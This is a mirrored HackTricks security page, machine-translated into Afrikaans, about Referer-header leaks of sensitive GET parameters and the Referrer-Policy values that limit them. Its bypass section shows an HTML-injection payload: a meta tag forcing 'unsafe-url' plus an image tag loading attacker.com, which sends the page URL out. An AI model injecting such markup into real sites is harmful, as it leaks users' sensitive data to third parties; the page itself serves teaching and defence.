Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/interesting-http.md
Translator workflow 9f40607d8c Translated to Afrikaans
2024-02-11 02:07:06 +00:00

3.5 KiB
Raw Blame History

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Verwysingshoofers en beleid

Verwysing is die hoofer wat deur webblaaier gebruik word om aan te dui watter vorige bladsy besoek is.

Gelekte sensitiewe inligting

As op enige punt binne 'n webbladsy enige sensitiewe inligting op GET-versoekparameters geleë is, as die bladsy skakels na eksterne bronne bevat of as 'n aanvaller in staat is om die gebruiker te laat besoek maak aan 'n URL wat deur die aanvaller beheer word. Dit kan in staat wees om die sensitiewe inligting binne die laaste GET-versoek uit te voer.

Versagting

Jy kan die blaaier laat volg 'n Verwysingsbeleid wat die sensitiewe inligting kan verhoed om na ander webtoepassings gestuur te word:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Teenmaatreëls

Jy kan hierdie reël oorskryf deur 'n HTML meta-etiket te gebruik (die aanvaller moet HTML-inspuiting benut):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Verdediging

Plaas nooit enige sensitiewe data binne GET parameters of paaie in die URL.

Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: